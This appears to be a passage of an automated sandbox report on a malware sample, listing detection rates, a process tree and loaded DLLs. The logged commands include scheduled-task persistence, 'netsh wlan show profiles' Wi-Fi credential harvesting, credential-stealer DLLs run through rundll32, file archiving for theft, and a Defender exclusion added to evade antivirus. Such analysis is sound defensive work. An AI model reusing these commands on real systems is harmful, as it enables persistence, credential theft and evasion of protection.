Source: d361f35322.exe, 00000009.00000003.2767781607.0000000007DB1000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000009.00000003.2766547058.0000000007DB1000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2941355973.0000000007CD2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2942331492.0000000008153000.00000004.00000020.00020000.00000000.sdmp, u6po.0.exe, 00000033.00000003.2239168944.00000000220D4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 1CMweaqlKp.exe ReversingLabs: Detection: 50%
Source: 1CMweaqlKp.exe Virustotal: Detection: 44%
Source: amert.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: d361f35322.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: d361f35322.exe String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
Source: C:\Users\user\Desktop\1CMweaqlKp.exe File read: C:\Users\user\Desktop\1CMweaqlKp.exe
Source: unknown Process created: C:\Users\user\Desktop\1CMweaqlKp.exe "C:\Users\user\Desktop\1CMweaqlKp.exe"
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Process created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe "C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe"
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://%3cfnc1%3e(79)/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2656 --field-trial-handle=2296,i,9301016893778941798,11505312185340456869,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe "C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe"
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process created: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe "C:\Users\user\AppData\Local\Temp\1000019001\amert.exe"
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process created: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe "C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe"
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process created: C:\Users\user\1000021002\ac861238af.exe "C:\Users\user\1000021002\ac861238af.exe"
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\1000021002\ac861238af.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\netsh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe "C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe"
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
Source: unknown Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: unknown Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2588 -s 928
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe "C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe "C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe"
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe" /F
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe "C:\Users\user\AppData\Local\Temp\1000071001\jok.exe"
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Process created: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe "C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3696 --field-trial-handle=2296,i,9301016893778941798,11505312185340456869,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe "C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe"
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Process created: C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe "C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe "C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe"
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe Process created: C:\Users\user\AppData\Local\Temp\u6po.0.exe "C:\Users\user\AppData\Local\Temp\u6po.0.exe"
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe" -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Process created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe "C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe"
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe "C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe"
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process created: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe "C:\Users\user\AppData\Local\Temp\1000019001\amert.exe"
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process created: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe "C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe"
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process created: C:\Users\user\1000021002\ac861238af.exe "C:\Users\user\1000021002\ac861238af.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2656 --field-trial-handle=2296,i,9301016893778941798,11505312185340456869,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3696 --field-trial-handle=2296,i,9301016893778941798,11505312185340456869,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe "C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe "C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe "C:\Users\user\AppData\Local\Temp\1000071001\jok.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe "C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe "C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: unknown unknown
Source: C:\Users\user\1000021002\ac861238af.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2588 -s 928
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe" /F
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Process created: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe "C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe"
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Process created: C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe "C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe"
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe Process created: C:\Users\user\AppData\Local\Temp\u6po.0.exe "C:\Users\user\AppData\Local\Temp\u6po.0.exe"
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe" -Force
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: mstask.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: dui70.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: duser.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: chartv.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: kernel.appcore.dll
